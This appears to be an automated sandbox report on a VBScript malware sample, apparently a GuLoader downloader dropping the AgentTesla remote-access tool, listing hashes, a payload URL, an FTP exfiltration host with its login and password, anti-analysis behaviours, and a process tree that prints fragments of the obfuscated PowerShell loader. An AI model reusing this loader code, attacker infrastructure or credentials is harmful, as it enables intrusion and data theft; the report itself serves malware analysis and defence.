Analysis
max time kernel: 90s
max time network: 149s
platform: windows10-2004_x64
resource: win10v2004-20220901-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220901-en, locale:en-us, os:windows10-2004-x64, system
submitted: 08-02-2023 12:31
Static task: static1
Behavioral task: behavioral1
Sample: 20230208100.vbs
Resource: win7-20220812-en
Behavioral task: behavioral2
Sample: 20230208100.vbs
Resource: win10v2004-20220901-en
General
Target: 20230208100.vbs
Size: 131KB
MD5: 41dc8a33e0ad3c7e1dc6a7e82ceef9f3
SHA1: ef04a98fbb86bd0184849d8af88eb34ebdef877b
SHA256: 25c62da172ade20b30e71185ff9ae1cb19713dbc8a86c306167e7e046912c3b6
SHA512: 400e6067d3b24763396250ddc5dcc41cfcf7093ad4f498e8a8427c97dd2464cf05041bcd48c8d69daf741413601b9affd958d45c6c479fa882b1d2cfb8824fa0
SSDEEP: 3072:v/rJmOzfVKUTvt3cXHRTj8ae2ZgnUVUo4WJrs0uoOpXdOQYtjQQwMBF+8n8RGYiw:v/gcfs+qxToS6U6+0pdaQQwm5Yf/
Malware Config
Extracted
http://megookbpnq.cf/Uninter.thn
Extracted
agenttesla
Protocol: ftp
Host: ftp://ftp.valvulasthermovalve.cl/
Port: 21
Username: [email protected]
Password: LILKOOLL14!!
Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in Visual Basic.

Guloader, Cloudeye
A shellcode-based downloader first seen in 2020.

Blocklisted process makes network request (1 IoCs)
Processes: powershell.exe
- flow 22, pid 1872, process powershell.exe

Checks QEMU agent file (2 TTPs, 2 IoCs)
Checks presence of QEMU agent, possibly to detect virtualization.
Processes: powershell.exe, caspol.exe
- File opened (read-only): C:\Program Files\Qemu-ga\qemu-ga.exe (process powershell.exe)
- File opened (read-only): C:\Program Files\Qemu-ga\qemu-ga.exe (process caspol.exe)

Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes: WScript.exe
- Key value queried: \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation (process WScript.exe)

Suspicious use of NtCreateThreadExHideFromDebugger (1 IoCs)
Processes: caspol.exe
- pid 3008, process caspol.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
Processes: powershell.exe, caspol.exe
- pid 1872, process powershell.exe
- pid 3008, process caspol.exe

Suspicious use of SetThreadContext (1 IoCs)
Processes: powershell.exe
- PID 1872 set thread context of 3008 (pid 1872, process powershell.exe, target process caspol.exe)

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash (1 IoCs)
Processes: WerFault.exe
- pid 4432, pid_target 3008, process WerFault.exe, target process caspol.exe

Gathers network information (2 TTPs, 1 IoCs)
Uses commandline utility to view network configuration.
Processes: ipconfig.exe
- pid 384, process ipconfig.exe

Suspicious behavior: EnumeratesProcesses (6 IoCs)
Processes: powershell.exe, powershell.exe, caspol.exe
- pid 1804, process powershell.exe
- pid 1804, process powershell.exe
- pid 1872, process powershell.exe
- pid 1872, process powershell.exe
- pid 3008, process caspol.exe
- pid 3008, process caspol.exe

Suspicious behavior: MapViewOfSection (1 IoCs)
Processes: powershell.exe
- pid 1872, process powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes: powershell.exe, powershell.exe, caspol.exe
- Token: SeDebugPrivilege (pid 1804, process powershell.exe)
- Token: SeDebugPrivilege (pid 1872, process powershell.exe)
- Token: SeDebugPrivilege (pid 3008, process caspol.exe)

Suspicious use of WriteProcessMemory (13 IoCs)
Processes: WScript.exe, powershell.exe, powershell.exe
- PID 4848 wrote to memory of 384 (pid 4848, process WScript.exe, target process ipconfig.exe)
- PID 4848 wrote to memory of 384 (pid 4848, process WScript.exe, target process ipconfig.exe)
- PID 4848 wrote to memory of 4820 (pid 4848, process WScript.exe, target process cmd.exe)
- PID 4848 wrote to memory of 4820 (pid 4848, process WScript.exe, target process cmd.exe)
- PID 4848 wrote to memory of 1804 (pid 4848, process WScript.exe, target process powershell.exe)
- PID 4848 wrote to memory of 1804 (pid 4848, process WScript.exe, target process powershell.exe)
- PID 1804 wrote to memory of 1872 (pid 1804, process powershell.exe, target process powershell.exe)
- PID 1804 wrote to memory of 1872 (pid 1804, process powershell.exe, target process powershell.exe)
- PID 1804 wrote to memory of 1872 (pid 1804, process powershell.exe, target process powershell.exe)
- PID 1872 wrote to memory of 3008 (pid 1872, process powershell.exe, target process caspol.exe)
- PID 1872 wrote to memory of 3008 (pid 1872, process powershell.exe, target process caspol.exe)
- PID 1872 wrote to memory of 3008 (pid 1872, process powershell.exe, target process caspol.exe)
- PID 1872 wrote to memory of 3008 (pid 1872, process powershell.exe, target process caspol.exe)

Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20230208100.vbs" 1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID: 4848
C:\Windows\System32\ipconfig.exe
ipconfig /flushdns 2⤵
- Gathers network information
PID: 384
C:\Windows\System32\cmd.exe
cmd /c echo shell 2⤵
PID: 4820
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Spalt = """[obfuscated payload string removed]""";Function Bredtfavne9 { param([String]$Bathy); For($Grey=2; $Grey -lt $Bathy.Length-1; $Grey+=(2+1)){$isom = $isom + $Bathy.Substring($Grey, 1)}; $isom;}$Escribie0 = Bredtfavne9 'ReITeEeqXFr ';$Escribie1= Bredtfavne9 $Spalt;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Escribie1 ;}else{&$Escribie0 $Escribie1;}" 2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 1804
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$Bathy); $Lavadelsme135 = ''; Write-Host $Lavadelsme135; Write-Host $Lavadelsme135; Write-Host $Lavadelsme135; $Teniacida = New-Object byte[] ($Bathy.Length / 2); For($Grey=0; $Grey -lt $Bathy.Length; $Grey+=2){ $Teniacida[$Grey/2] = [convert]::ToByte($Bathy.Substring($Grey, 2), 16); $Teniacida[$Grey/2] = ($Teniacida[$Grey/2] -bxor 55); } [String][System.Text.Encoding]::ASCII.GetString($Teniacida);}[hex-encoded script body removed]" 3⤵
- Blocklisted process makes network request
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 1872
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe" 4⤵
- Checks QEMU agent file
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 3008
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3008 -s 1920 5⤵
- Program crash
PID: 4432
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3008 -ip 3008 1⤵
PID: 4188